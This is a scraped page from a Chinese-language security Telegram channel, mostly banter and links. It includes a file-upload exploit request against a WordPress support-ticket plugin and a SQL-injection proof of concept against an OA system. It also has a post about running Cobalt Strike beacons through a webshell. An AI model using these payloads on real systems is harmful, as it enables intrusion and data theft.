踹哈公寓 – Telegram
踹哈公寓
@Oracleimpact
4.11K subscribers
589 photos
19 videos
307 files
357 links
一等情事

https://news.1rj.ru/str/chuaihagongyu
Download Telegram
About
Blog
Apps
Platform
Join
踹哈公寓
4.11K subscribers
踹哈公寓
WordPress-js-support-ticket存在文件上传漏洞

POST /wp-admin/?page=configuration&task=saveconfiguration HTTP/1.1Host: Content-Type: multipart/form-data; boundary=--------767099171User-Agent: Mozilla/5.0 ----------767099171Content-Disposition: form-data; name="action"configuration_saveconfiguration----------767099171Content-Disposition: form-data; name="form_request"jssupportticket----------767099171Content-Disposition: form-data; name="support_custom_img"; filename="{{rand8}}.php"Content-Type: image/png<?php echo md5(123);unlink(__FILE__);?>----------767099171--

http://ip/wp-content/plugins/js-support-ticket/jssupportticketdata/supportImg/{{rand8}}.php
👍21
2.01K views
踹哈公寓
仅需2000块,无敌大黑客鼹鼠哥就会教你《高级apt课程》

这年头真是什么乱七八糟的玩意都能自称apt,俩所谓的课程讲师,无聊哥墨白也不知道是何方神圣,哪个国家队的现役选手还是九八五网安实验室吗?啥资历也没有的就开始apt了a了个牛摩洛哥炒饼,不如暗月小迪一根j8毛的玩意
😁10
2.16K views
踹哈公寓
https://bi.aliyun.com/hack-by-Helen.txt

海伦入侵阿里云
2.24K views
踹哈公寓
https://bi.aliyun.com/Oracle.txt

我也成功入侵阿里云了
2.04K views
踹哈公寓
笑点解析

阿里云(无敌大厂)
去年雷池rce型的黑客手法
hack by 小鸟游星野
然后发出去装逼,我是潜伏在tg里一个真实存在的黑过阿里云的惊人的老人
🍓2
1.98K views
踹哈公寓
Forwarded from 轩白
2.28K views
踹哈公寓
你伦哥疑似有点嫌🍊没蹲够了
😁7
2.49K views
踹哈公寓
Forwarded from 表 弟
https://mp.weixin.qq.com/s/uGWl8qLMqsq3OW_hiPLPYg
2.33K views
踹哈公寓
【【陈鑫杰】又有国防部被黑,美国发布最新国防网络安全战略 | 杰哥说安全-哔哩哔哩】 https://b23.tv/r6KXrs2

哪位群友
2.4K views
踹哈公寓
https://mp.weixin.qq.com/s/iBkJUx8FlfNhqQOHA91KrQ
2.31K views
踹哈公寓
我知道我这人嘴讨嫌tg上招惹了不少人不少大黑客,这个正常,你看我不爽你私聊也好群里骂娘也好随便你,反正网上冲浪就图一乐嘛对吧

你对我有意见你也说清楚哪里有意见行吗?你们这些个无敌的大黑客黑产神,低能到就天天往人邮箱里塞鬼图是吧。第一次我打开可能还吓一跳,第二次第三次莫名奇妙不认识的人给我发邮件你觉得我会不知道里边是啥玩意吗?是你傻还是我傻

我素质低我承认,逮到别人短处就爱揪着不放,但是我不会莫名其妙无缘无故的追着人骂。有的人或者有些组织又菜又爱装,装不下去了撒泼打滚红温骂娘,骂娘骂不动就整些难绷烂活往别人邮箱里塞鬼图跳脸gif,你多大了啊孩子
👍9🥴3😢2👎1
2.43K views
踹哈公寓
🤯6👎1🍌1
2.46K views
踹哈公寓
👎83💩1
2.62K views
踹哈公寓
有无内网大手子给我解答一下

首先是cs这个判断上线机器的机制是统计session,导致了第一个比较幽默的情况是,同样一台服务器我用webshell运行cs的后门运行了两次,cs就以为我上线了两台机器

这个都是可以理解的,然后很诡异的是我昨天把c2关了,今天再打开这两台(其实是一台)机器就黑了显示没开机,但是其实是开机的,我再用webshell运行后门exe又上线了,现在就是看到视图里边三台上线机器其实就是一台,并且处于一个薛定谔的开机状态,昨天的beacon告诉我没开机今天的beacon告诉我开机了,这咋回事
2👎1🤔1
2.82K views
踹哈公寓
易宝OA GetProductInv SQL注入漏洞复现

GET /SmartTradeScan/Inventory/GetProductInv?boxNoName=1%27%20AND%201411%20IN%20(SELECT%20(CHAR(113)%2bCHAR(98)%2bCHAR(112)%2bCHAR(112)%2bCHAR(113)%2b(SELECT%20(CASE%20WHEN%20(1411=1411)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))%2bCHAR(113)%2bCHAR(120)%2bCHAR(122)%2bCHAR(122)%2bCHAR(113)))--%20YyAm&positionName=2&productID=3&opeID=4 HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/107.0.712.36 Safari/537.36
Accept-Encoding: gzip, deflate
Connection: close
1👍1👎1
2.51K views
踹哈公寓
https://mp.weixin.qq.com/s/YUoYMHQ7PFhzA8HeJmNHtA
Weixin Official Accounts Platform
深信服:开除 42 人、1 人被刑事立案
👎2👏1
2.34K views
踹哈公寓
https://github.com/telegramdesktop/tdesktop/blob/84ce72ec7a7f39dddeea5c311a4ec1eb2776847b/Telegram/SourceFiles/dialogs/dialogs_row.cpp#L437
GitHub
tdesktop/Telegram/SourceFiles/dialogs/dialogs_row.cpp at 84ce72ec7a7f39dddeea5c311a4ec1eb2776847b · telegramdesktop/tdesktop
Telegram Desktop messaging app. Contribute to telegramdesktop/tdesktop development by creating an account on GitHub.
👎1
2.65K views
踹哈公寓
This media is not supported in your browser
VIEW IN TELEGRAM
😱15👎6👍4😁2😈1
4.63K views
踹哈公寓
https://mp.weixin.qq.com/s/dU9yY_8plGnByKBumV1y9w
Weixin Official Accounts Platform
对于xz投毒事件始作俑者身份的分析
首先我得说,对于吃瓜而言发布这篇文章的时间比较过气。但是笔者向来笃信的是没有调查就没有发言权,本公众号所有原创内容都是笔者一个字一个字写的,写得慢很正常嘛^ ^。
😁6🤡5
2.21K views
踹哈公寓
https://mp.weixin.qq.com/s/PgduTGIvWSUgHZhVfnb7Bg

有点过了

事实上任何一个规模大到一定程度参与人数众多的技术项目,时间长了都或多或少会整出些唐氏操作,注意用词我这里说的是唐氏,就是相当脑残的错误了,不是小过失

阿里腾讯这些大厂的人不会像我们想象中那样无所不能永远正确,说是草台班子还是过了,这件事情最ex人的其实是后期腾讯云的公关,经典推卸责任大事化小忽悠用户。但是不要因为这么一件两件事情就扯什么不要用腾讯云了,不知名小机房的问题只会比大厂更多

最后加一句,冯若航作为搞数据库从他的角度一直在反对业务上云,开发圈争论这个事情很久了,我不了解。但是从安全的角度来看重要敏感业务云服务器是非常必要的,最好把邮服都上云了。一个外网口子只要是在域环境内不是云机房远程托管被各方惦记的概率直线上升——你那玩意背后连着内网的,起0day都要把你拿下了
👍7
3.32K viewsedited